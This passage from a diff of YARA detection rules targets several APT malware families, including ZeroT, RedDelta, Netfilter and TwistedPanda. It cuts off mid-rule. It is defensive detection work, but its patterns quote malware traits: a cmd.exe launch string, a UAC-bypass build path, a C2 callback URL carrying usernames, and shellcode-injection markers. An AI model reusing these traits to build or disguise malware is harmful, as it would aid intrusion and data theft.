reference = "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/line/ncsc-tip-line-dancer.pdf"
date = "2024-04-24"
score = 75
id = "3b49a861-8107-577a-bae1-ae28d424cc13"
strings:
$ = { 48 8D 5E 20 48 8D 3D BB FF FF FF BA 20 00 00 00 }
$ = { 4C 89 EE 44 89 F2 48 8D 3D 9A 27 00 00 }
$ = { 41 FF D7 41 5F 41 5E 41 5D 41 5C 5B 5D 48 C7 C0 01 00 00 00 5F }
condition:
all of them
}

View file

@ -0,0 +1,37 @@
rule APT_MAL_MalDoc_CloudAtlas_Oct20_1 {
meta:
description = "Detects unknown maldoc dropper noticed in October 2020"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/jfslowik/status/1316050637092651009"
date = "2020-10-13"
hash1 = "7ba76b2311736dbcd4f2817c40dae78f223366f2404571cd16d6676c7a640d70"
id = "e7caf2b2-caf2-5984-a792-8224f2641bda"
strings:
$x1 = "https://msofficeupdate.org" wide
condition:
uint16(0) == 0xcfd0 and
filesize < 300KB and
1 of ($x*)
}
rule APT_MAL_URL_CloudAtlas_Oct20_2 {
meta:
description = "Detects unknown maldoc dropper noticed in October 2020 - file morgue6visible5bunny6culvert7ambo5nun1illuminate4.url"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/jfslowik/status/1316050637092651009"
date = "2020-10-13"
hash1 = "a6a58b614a9f5ffa1d90b5d42e15521f52e2295f02c1c0e5cd9cbfe933303bee"
id = "91f6362f-1793-58a3-a750-04ec9812b9df"
strings:
/* [InternetShortcut]
URL=https://msofficeupdate.org/ */
$hc1 = { 5B 49 6E 74 65 72 6E 65 74 53 68 6F 72 74 63 75
74 5D 0D 0A 55 52 4C 3D 68 74 74 70 73 3A 2F 2F
6D 73 6F 66 66 69 63 65 75 70 64 61 74 65 2E 6F
72 67 }
condition:
uint16(0) == 0x495b and
filesize < 200 and
$hc1 at 0
}

View file

@ -0,0 +1,61 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2015-07-22
Identifier: CloudDuke
*/
/* Rule Set ----------------------------------------------------------------- */
rule CloudDuke_Malware {
meta:
description = "Detects CloudDuke Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.f-secure.com/weblog/archives/00002822.html"
date = "2015-07-22"
score = 60
hash1 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
hash2 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
hash3 = "1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7"
hash4 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
hash5 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
hash6 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
hash7 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
id = "902ef68b-7ed1-5622-b796-4e3bb2388124"
strings:
$s1 = "ProcDataWrap" fullword ascii
$s2 = "imagehlp.dll" fullword ascii
$s3 = "dnlibsh" fullword ascii
$s4 = "%ws_out%ws" fullword wide
$s5 = "Akernel32.dll" fullword wide
$op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b } /* Opcode */
$op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f } /* Opcode */
$op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 } /* Opcode */
condition:
uint16(0) == 0x5a4d and filesize < 720KB and 4 of ($s*) and 1 of ($op*)
}
/* Super Rules ------------------------------------------------------------- */
rule SFXRAR_Acrotray {
meta:
description = "Most likely a malicious file acrotray in SFX RAR / CloudDuke APT 5442.1.exe, 5442.2.exe"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.f-secure.com/weblog/archives/00002822.html"
date = "2015-07-22"
super_rule = 1
score = 70
hash1 = "51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57"
hash2 = "5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48"
hash3 = "56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198"
id = "1566fb75-d3a8-5e22-b05b-3a2f37374f31"
strings:
$s1 = "winrarsfxmappingfile.tmp" fullword wide /* PEStudio Blacklist: strings */
$s2 = "GETPASSWORD1" fullword wide /* PEStudio Blacklist: strings */
$s3 = "acrotray.exe" fullword ascii
$s4 = "CryptUnprotectMemory failed" fullword wide /* PEStudio Blacklist: strings */
condition:
uint16(0) == 0x5a4d and filesize < 2449KB and all of them
}

View file

@ -0,0 +1,31 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2017-10-03
Identifier: CMStar Threat Actor
Reference: https://goo.gl/pTffPA
*/
/* Rule Set ----------------------------------------------------------------- */
import "pe"
rule CMStar_Malware_Sep17 {
meta:
description = "Detects CMStar Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/pTffPA"
date = "2017-10-03"
hash1 = "16697c95db5add6c1c23b2591b9d8eec5ed96074d057b9411f0b57a54af298d5"
id = "d6c9cd7f-06ce-5641-b9b2-c81daf18628d"
strings:
$s1 = "UpdateService.tmp" fullword ascii
$s2 = "StateNum:%d,FileSize:%d" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 100KB and (
pe.imphash() == "22021985de78a48ea8fb82a2ff9eb693" or
pe.exports("WinCred") or
all of them
)
}

View file

@ -0,0 +1,52 @@
/* slightly modified to detect only samples with a size upt to 1 MB */
rule MAL_Netfilter_Dropper_Jun_2021_1 {
meta:
description = "Detects the dropper of Netfilter rootkit"
author = "Arkbird_SOLG"
reference = "https://twitter.com/struppigel/status/1405483373280235520"
date = "2020-06-18"
hash1 = "a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac"
hash2 = "659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9"
hash3 = "d0a03a8905c4f695843bc4e9f2dd062b8fd7b0b00103236b5187ff3730750540"
tlp = "White"
adversary = "Chinese APT Group"
id = "d91f48aa-9580-572d-a72c-19b80624cdbe"
strings:
$seq1 = { b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fe ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 00 00 88 85 dc fd ff ff b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fd ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 50 00 50 e8 ?? 0d 00 00 83 c4 04 89 85 d8 fd ff ff 8b 85 d8 fd ff ff 89 85 d4 fd ff ff b8 00 00 50 00 50 b8 00 00 00 00 50 8b 85 d8 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c 8b 45 0c 8b 8d d8 fd ff ff 89 08 b8 3c 00 00 00 50 b8 00 00 00 00 50 8d 85 98 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c b8 3c 00 00 00 89 85 98 fd ff ff 8d 85 98 fd ff ff 83 c0 10 8d 8d dc fe ff ff 89 08 8d 85 98 fd ff ff 83 c0 14 b9 00 01 00 00 89 08 8d 85 98 fd ff ff 83 c0 2c 8d 8d dc fd ff ff 89 08 8d 85 98 fd ff ff 83 c0 30 b9 00 01 00 00 89 08 b8 0a 31 40 00 50 e8 ?? 0c 00 00 89 85 94 fd ff ff b8 16 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 fc b8 28 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 f8 b8 36 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f4 b8 47 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f0 b8 58 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 ec b8 69 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e8 b8 7a 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e4 b8 8e 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e0 8b 45 08 50 e8 ?? 0b 00 00 83 c4 04 8d 8d 98 fd ff ff 51 b9 00 00 00 00 51 50 8b 45 08 50 8b 45 fc ff d0 85 }
$seq2 = { b8 00 00 00 00 89 85 90 fd ff ff b8 00 00 00 00 89 85 8c fd ff ff b8 00 00 00 00 89 85 88 fd ff ff b8 00 00 00 00 89 85 84 fd ff ff b8 04 00 00 00 89 85 80 fd ff ff b8 00 00 00 00 88 85 7f f5 ff ff b8 00 08 00 00 50 b8 00 00 00 00 50 8d 85 80 f5 ff ff 50 e8 ?? 0b 00 00 83 c4 0c b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 9d 31 40 00 50 8b 45 f8 ff d0 89 85 90 fd ff ff 8b 85 }
$s1 = "%s\\netfilter.sys" fullword ascii
$s2 = "SYSTEM\\CurrentControlSet\\Services\\netfilter" fullword ascii
$s3 = "\\\\.\\netfilter" fullword ascii
condition:
uint16(0) == 0x5a4d
and filesize > 6KB and filesize < 1000KB
and (all of ($seq*) or 2 of ($s*))
}
rule MAL_Netfilter_May_2021_1 {
meta:
description = "Detects Netfilter rootkit"
author = "Arkbird_SOLG"
reference = "https://twitter.com/struppigel/status/1405483373280235520"
date = "2020-06-18"
hash1 = "63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0"
hash2 = "8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870"
hash3 = "d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe"
tlp = "White"
adversary = "Chinese APT Group"
id = "0ac01eb3-435b-52b0-b8e8-ace2ebb34f60"
strings:
$seq1 = { 48 8b 05 a9 57 ff ff 45 33 c9 49 b8 32 a2 df 2d 99 2b 00 00 48 85 c0 74 05 49 3b c0 75 38 0f 31 48 c1 e2 20 48 8d 0d 85 57 ff ff 48 0b c2 48 33 c1 48 89 05 78 57 ff ff 66 44 89 0d 76 57 ff ff 48 8b 05 69 57 ff ff 48 85 c0 75 0a 49 8b c0 48 89 05 5a 57 ff ff 48 f7 d0 48 89 05 58 57 }
$seq2 = { 48 83 ec 38 48 83 64 24 20 00 48 8d 05 83 4c 00 00 48 8d 15 24 d1 00 00 48 89 44 24 28 48 8d 4c 24 20 e8 4d 05 00 00 85 c0 78 16 4c 8d 05 22 d1 00 00 83 ca ff 48 8d 0d 00 d1 00 00 e8 39 05 00 00 48 83 c4 }
$seq3 = { 45 33 c0 48 8d 4c 24 40 41 8d 50 01 ff 15 5d 62 00 00 c6 84 24 88 00 00 00 01 48 8d 84 24 88 00 00 00 48 89 46 18 48 8d 0d e2 fe ff ff 48 89 9e c0 00 00 00 48 8d 44 24 40 48 89 46 50 48 8d 44 24 30 48 89 46 48 65 48 8b 04 25 88 01 00 00 48 89 86 98 00 00 00 48 8b 86 b8 00 00 00 40 88 7e 40 c6 40 b8 06 4c 89 78 e0 48 89 58 e8 c7 40 c0 01 00 00 00 c7 40 c8 0d 00 00 00 48 89 58 d0 48 8b 86 b8 00 00 00 48 89 48 f0 48 8d 4c 24 40 48 89 48 f8 c6 40 bb e0 48 8b 43 28 48 85 c0 74 2f 48 8b 48 10 48 85 c9 74 07 48 21 78 10 4c 8b f1 48 8b 08 48 85 c9 74 06 48 21 38 48 8b e9 48 8b 48 08 48 85 c9 74 08 48 83 60 08 00 48 8b f9 48 8b d6 49 8b cf ff 15 74 61 00 00 3d 03 01 00 00 75 19 48 83 64 24 20 00 48 8d 4c 24 40 41 b1 01 45 33 c0 33 d2 ff 15 64 61 00 00 48 8b 43 28 48 85 c0 74 1a 4d }
$seq4 = { 8b 84 24 80 00 00 00 48 8d 54 24 38 48 8b 4c 24 30 44 8b ce 89 44 24 28 45 33 c0 48 89 7c 24 20 ff 15 66 2e 00 00 48 8b 4c 24 30 8b d8 ff 15 49 2e 00 00 48 8b 4c 24 30 ff 15 26 2d 00 00 8b }
$s1 = "%sc=%s" fullword ascii
$s2 = { 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 }
$s3 = "NETIO.SYS" fullword ascii
condition:
uint16(0) == 0x5a4d
and filesize > 20KB and filesize < 1000KB
and (3 of ($seq*) or 2 of ($s*))
}

View file

@ -0,0 +1,241 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2017-02-03
Identifier: ZeroT CN APT
*/
/* Rule Set ----------------------------------------------------------------- */
rule PP_CN_APT_ZeroT_1 {
meta:
description = "Detects malware from the Proofpoint CN APT ZeroT incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
date = "2017-02-03"
hash1 = "09061c603a32ac99b664f7434febfc8c1f9fd7b6469be289bb130a635a6c47c0"
id = "c16f3abb-ac7e-5d5f-b8d7-b105cff3886e"
strings:
$s1 = "suprise.exe" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 2000KB and all of them )
}
rule PP_CN_APT_ZeroT_2 {
meta:
description = "Detects malware from the Proofpoint CN APT ZeroT incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
date = "2017-02-03"
hash1 = "74eb592ef7f5967b14794acdc916686e061a43169f06e5be4dca70811b9815df"
id = "8433216e-1189-568c-bd18-051fb1fec215"
strings:
$s1 = "NO2-2016101902.exe" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 2000KB and all of them )
}
rule PP_CN_APT_ZeroT_3 {
meta:
description = "Detects malware from the Proofpoint CN APT ZeroT incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
date = "2017-02-03"
hash1 = "ee2e2937128dac91a11e9bf55babc1a8387eb16cebe676142c885b2fc18669b2"
id = "99aa29cf-d962-5a3d-bd28-6486c40822bb"
strings:
$s1 = "/svchost.exe" fullword ascii
$s2 = "RasTls.dll" fullword ascii
$s3 = "20160620.htm" fullword ascii
$s4 = "* $l&$" fullword ascii
$s5 = "dfjhmh" fullword ascii
$s6 = "/20160620.htm" fullword ascii
condition:
( uint16(0) == 0x5449 and filesize < 1000KB and 3 of them ) or ( all of them )
}
rule PP_CN_APT_ZeroT_4 {
meta:
description = "Detects malware from the Proofpoint CN APT ZeroT incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
date = "2017-02-03"
hash1 = "a9519d2624a842d2c9060b64bb78ee1c400fea9e43d4436371a67cbf90e611b8"
id = "b21961ee-d346-51d3-bacd-02554240162d"
strings:
$s1 = "Mcutil.dll" fullword ascii
$s2 = "mcut.exe" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 1000KB and all of them )
}
rule PP_CN_APT_ZeroT_5 {
meta:
description = "Detects malware from the Proofpoint CN APT ZeroT incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
date = "2017-02-03"
hash1 = "74dd52aeac83cc01c348528a9bcb20bbc34622b156f40654153e41817083ba1d"
id = "2a7c6a36-aace-562e-bbc4-425c1d93fab1"
strings:
$x1 = "dbozcb" fullword ascii
$s1 = "nflogger.dll" fullword ascii
$s2 = "/svchost.exe" fullword ascii
$s3 = "1207.htm" fullword ascii
$s4 = "/1207.htm" fullword ascii
condition:
( uint16(0) == 0x5449 and filesize < 1000KB and 1 of ($x*) and 1 of ($s*) ) or ( all of them )
}
rule PP_CN_APT_ZeroT_6 {
meta:
description = "Detects malware from the Proofpoint CN APT ZeroT incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
date = "2017-02-03"
hash1 = "a16078c6d09fcfc9d6ff7a91e39e6d72e2d6d6ab6080930e1e2169ec002b37d3"
id = "2e3bb4bd-5e20-56e7-a82b-d717d83eaeeb"
strings:
$s1 = "jGetgQ|0h9=" fullword ascii
$s2 = "\\sfxrar32\\Release\\sfxrar.pdb"
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and all of them
}
rule PP_CN_APT_ZeroT_7 {
meta:
description = "Detects malware from the Proofpoint CN APT ZeroT incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
date = "2017-02-03"
hash1 = "fc2d47d91ad8517a4a974c4570b346b41646fac333d219d2f1282c96b4571478"
id = "e9cdca86-84a8-5673-935c-c319b523674b"
strings:
$s1 = "RasTls.dll" fullword ascii
$s2 = "RasTls.exe" fullword ascii
$s4 = "LOADER ERROR" fullword ascii
$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 1000KB and all of them )
}
rule PP_CN_APT_ZeroT_8 {
meta:
description = "Detects malware from the Proofpoint CN APT ZeroT incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
date = "2017-02-03"
hash1 = "4ef91c17b1415609a2394d2c6c353318a2503900e400aab25ab96c9fe7dc92ff"
id = "f9a4f092-c699-5e91-9667-64ffe1b02bc1"
strings:
$s1 = "/svchost.exe" fullword ascii
$s2 = "RasTls.dll" fullword ascii
$s3 = "20160620.htm" fullword ascii
$s4 = "/20160620.htm" fullword ascii
condition:
( uint16(0) == 0x5449 and filesize < 1000KB and 3 of them )
}
rule PP_CN_APT_ZeroT_9 {
meta:
description = "Detects malware from the Proofpoint CN APT ZeroT incident"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
date = "2017-02-03"
hash1 = "a685cf4dca6a58213e67d041bba637dca9cb3ea6bb9ad3eae3ba85229118bce0"
id = "e1c32993-409c-5a62-8239-cff99fb83a7f"
strings:
$x1 = "nflogger.dll" fullword ascii
$s7 = "Zlh.exe" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 1000KB and all of them )
}
rule CN_APT_ZeroT_nflogger {
meta:
description = "Chinese APT by Proofpoint ZeroT RAT - file nflogger.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
date = "2017-02-04"
hash1 = "946adbeb017616d56193a6d43fe9c583be6ad1c7f6a22bab7df9db42e6e8ab10"
id = "0d23f312-e3b6-5c23-855b-25ae54265512"
strings:
$x1 = "\\LoaderDll.VS2010\\Release\\" ascii
condition:
( uint16(0) == 0x5a4d and filesize < 200KB and all of them )
}
rule CN_APT_ZeroT_extracted_Go {
meta:
description = "Chinese APT by Proofpoint ZeroT RAT - file Go.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
date = "2017-02-04"
modified = "2023-01-06"
hash1 = "83ddc69fe0d3f3d2f46df7e72995d59511c1bfcca1a4e14c330cb71860b4806b"
id = "ba929e6d-4162-58e7-b8a8-bcb066b64522"
strings:
$x1 = "%s\\cmd.exe /c %s\\Zlh.exe" fullword ascii
$x2 = "\\BypassUAC.VS2010\\Release\\" ascii
$s1 = "Zjdsf.exe" fullword ascii
$s2 = "SS32prep.exe" fullword ascii
$s3 = "windowsgrep.exe" fullword ascii
$s4 = "Sysdug.exe" fullword ascii
$s5 = "Proessz.exe" fullword ascii
$s6 = "%s\\Zlh.exe" fullword ascii
$s7 = "/C %s\\%s" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 100KB and ( 1 of ($x*) or 3 of ($s*) ) ) or ( 7 of them )
}
rule CN_APT_ZeroT_extracted_Mcutil {
meta:
description = "Chinese APT by Proofpoint ZeroT RAT - file Mcutil.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
date = "2017-02-04"
hash1 = "266c06b06abbed846ebabfc0e683f5d20dadab52241bc166b9d60e9b8493b500"
id = "c887d36b-8aeb-54f1-a683-727561723238"
strings:
$s1 = "LoaderDll.dll" fullword ascii
$s2 = "QageBox1USER" fullword ascii
$s3 = "xhmowl" fullword ascii
$s4 = "?KEYKY" fullword ascii
$s5 = "HH:mm:_s" fullword ascii
$s6 = "=licni] has maX0t" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 90KB and 3 of them ) or ( all of them )
}
rule CN_APT_ZeroT_extracted_Zlh {
meta:
description = "Chinese APT by Proofpoint ZeroT RAT - file Zlh.exe"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
date = "2017-02-04"
hash1 = "711f0a635bbd6bf1a2890855d0bd51dff79021db45673541972fe6e1288f5705"
id = "4c8b9a90-6cb3-5aba-a993-f73207341d0e"
strings:
$s1 = "nflogger.dll" fullword wide
$s2 = "%s %d: CreateProcess('%s', '%s') failed. Windows error code is 0x%08x" fullword ascii
$s3 = "_StartZlhh(): Executed \"%s\"" ascii
$s4 = "Executable: '%s' (%s) %i" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 300KB and 3 of them )
}

View file

@ -0,0 +1,78 @@
rule APT_CN_MAL_RedDelta_Shellcode_Loader_Oct20_1 {
meta:
description = "Detects Red Delta samples"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
date = "2020-10-14"
hash1 = "30b2bbce0ca4cb066721c94a64e2c37b7825dd72fc19c20eb0ab156bea0f8efc"
hash2 = "42ed73b1d5cc49e09136ec05befabe0860002c97eb94e9bad145e4ea5b8be2e2"
hash3 = "480a8c883006232361c5812af85de9799b1182f1b52145ccfced4fa21b6daafa"
hash4 = "7ea7c6406c5a80d3c15511c4d97ec1e45813e9c58431f386710d0486c4898b98"
id = "47417488-e843-5346-9baa-fcce30b884d1"
strings:
$x1 = "InjectShellCode" ascii fullword
$s1 = "DotNetLoader.exe" wide ascii fullword
$s2 = "clipboardinject" ascii fullword
$s3 = "download.php?raw=1" wide
$s4 = "Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Levint" wide
$s5 = "FlashUpdate.exe" wide
$s6 = "raw_cc_url" ascii fullword
$op1 = { 48 8b 4c 24 78 48 89 01 e9 1a ff ff ff 48 8b 44 }
$op2 = { ff ff 00 00 77 2a 8b 44 24 38 8b 8c 24 98 }
condition:
uint16(0) == 0x5a4d and
filesize < 200KB and
$x1 or 3 of them
}
rule APT_CN_MAL_RedDelta_Shellcode_Loader_Oct20_2 {
meta:
description = "Detects Red Delta samples"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
date = "2020-10-14"
hash1 = "260ebbf392498d00d767a5c5ba695e1a124057c1c01fff2ae76db7853fe4255b"
hash2 = "9ccb4ed133be5c9c554027347ad8b722f0b4c3f14bfd947edfe75a015bf085e5"
hash3 = "b3fd750484fca838813e814db7d6491fea36abe889787fb7cf3fb29d9d9f5429"
id = "acb1024a-64af-51ac-84c8-7fe9a5bd4538"
strings:
$x1 = "\\CLRLoader.exe" wide fullword
$x2 = "/callback.php?token=%s&computername=%s&username=%s" ascii fullword
$s1 = "DotNetLoader.Program" wide fullword
$s2 = "/download.php?api=40" ascii fullword
$s3 = "get %d URLDir" ascii fullword
$s4 = "Read code failed" ascii fullword
$s5 = "OpenFile fail!" wide fullword
$s6 = "Writefile success" wide fullword
$op1 = { 4c 8d 45 e0 49 8b cc 41 8d 51 c3 e8 34 77 02 00 }
condition:
uint16(0) == 0x5a4d and
filesize < 3000KB and
1 of ($x*) or 4 of them
}
rule APT_CN_MAL_RedDelta_Shellcode_Loader_Oct20_3 {
meta:
description = "Detects Red Delta samples"
author = "Florian Roth (Nextron Systems)"
reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
date = "2020-10-14"
modified = "2022-12-21"
hash1 = "740992d40b84b10aa9640214a4a490e989ea7b869cea27dbbdef544bb33b1048"
id = "b52836bb-cdef-5416-a8e1-72d0b2298546"
strings:
$s1 = "Taskschd.dll" ascii fullword
$s2 = "AddTaskPlanDllVerson.dll" ascii fullword
$s3 = "\\FlashUpdate.exe" ascii
$s4 = "D:\\Project\\FBIRedTeam" ascii fullword
$s5 = "Error %s:%d, ErrorCode: %x" ascii fullword
condition:
uint16(0) == 0x5a4d and
filesize < 400KB and
4 of them
}

View file

@ -0,0 +1,194 @@
rule APT_CN_TwistedPanda_loader {
meta:
author = "Check Point Research"
description = "Detects loader used by TwistedPanda"
date = "2022-04-14"
reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
score = 80
hash1 = "5b558c5fcbed8544cb100bd3db3c04a70dca02eec6fedffd5e3dcecb0b04fba0"
hash2 = "efa754450f199caae204ca387976e197d95cdc7e83641444c1a5a91b58ba6198"
id = "a10f6019-f069-579c-b112-18537a7d8fd8"
strings:
// 6A 40 push 40h ; '@'
// 68 00 30 00 00 push 3000h
$seq1 = { 6A 40 68 00 30 00 00 }
// 6A 00 push 0 ; lpOverlapped
// 50 push eax ; lpNumberOfBytesRead
// 6A 14 push 14h ; nNumberOfBytesToRead
// 8D ?? ?? ?? ?? ?? lea eax, [ebp+Buffer]
// 50 push eax ; lpBuffer
// 53 push ebx ; hFile
// FF 15 04 D0 4C 70 call ds:ReadFile
$seq2 = { 6A 00 50 6A 14 8D ?? ?? ?? ?? ?? 50 53 FF }
// 6A 00 push 0
// 6A 00 push 0
// 6A 03 push 3
// 6A 00 push 0
// 6A 03 push 3
// 68 00 00 00 80 push 80000000h
$seq3 = { 6A 00 6A 00 6A 03 6A 00 6A 03 68 00 00 00 80 }
// Decryption sequence
$decryption = { 8B C? [2-3] F6 D? 1A C? [2-3] [2-3] 30 0? ?? 4? }
condition:
// MZ signature at offset 0 and ...
uint16(0) == 0x5A4D and
// ... PE signature at offset stored in MZ header at 0x3C
uint32(uint32(0x3C)) == 0x00004550 and
filesize < 3000KB and all of ($seq*) and $decryption
}
rule APT_CN_TwistedPanda_SPINNER_1 {
meta:
author = "Check Point Research"
description = "Detects the obfuscated variant of SPINNER payload used by TwistedPanda"
date = "2022-04-14"
reference = "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/"
score = 80
hash1 = "a9fb7bb40de8508606a318866e0e5ff79b98f314e782f26c7044622939dfde81"
id = "0b44013d-0caa-5ea2-ab08-e2a6a5732c03"
strings:
// C7 ?? ?? ?? 00 00 00 mov dword ptr [eax+??], ??
// C7 ?? ?? ?? 00 00 00 mov dword ptr [eax+??], ??
// C6 mov byte ptr [eax], 0
$config_init = { C7 ?? ?? ?? 00 00 00 C7 ?? ?? ?? 00 00 00 C6 }
$c2_cmd_1 = { 01 00 03 10}
$c2_cmd_2 = { 02 00 01 10}
$c2_cmd_3 = { 01 00 01 10}
// 8D 83 ?? ?? ?? ?? lea eax, xor_key[ebx]
// 80 B3 ?? ?? ?? ?? ?? xor xor_key[ebx], 50h
// 89 F1 mov ecx, esi ; this
// 6A 01 push 1 ; Size
// 50 push eax ; Src
// E8 ?? ?? ?? ?? call str_append
// 80 B3 ?? ?? ?? ?? ?? xor xor_key[ebx], 50h
$decryption = { 8D 83 [4] 80 B3 [5] 89 F1 6A 01 50 E8 [4] 80 B3 }
condition:
// MZ signature at offset 0 and ...
uint16(0) == 0x5A4D and
// ... PE signature at offset stored in MZ header at 0x3C
uint32(uint32(0x3C)) == 0x00004550 and
filesize < 3000KB and #config_init > 10 and 2 of ($c2_cmd_*) and $decryption
}
rule APT_CN_TwistedPanda_SPINNER_2 {
meta:
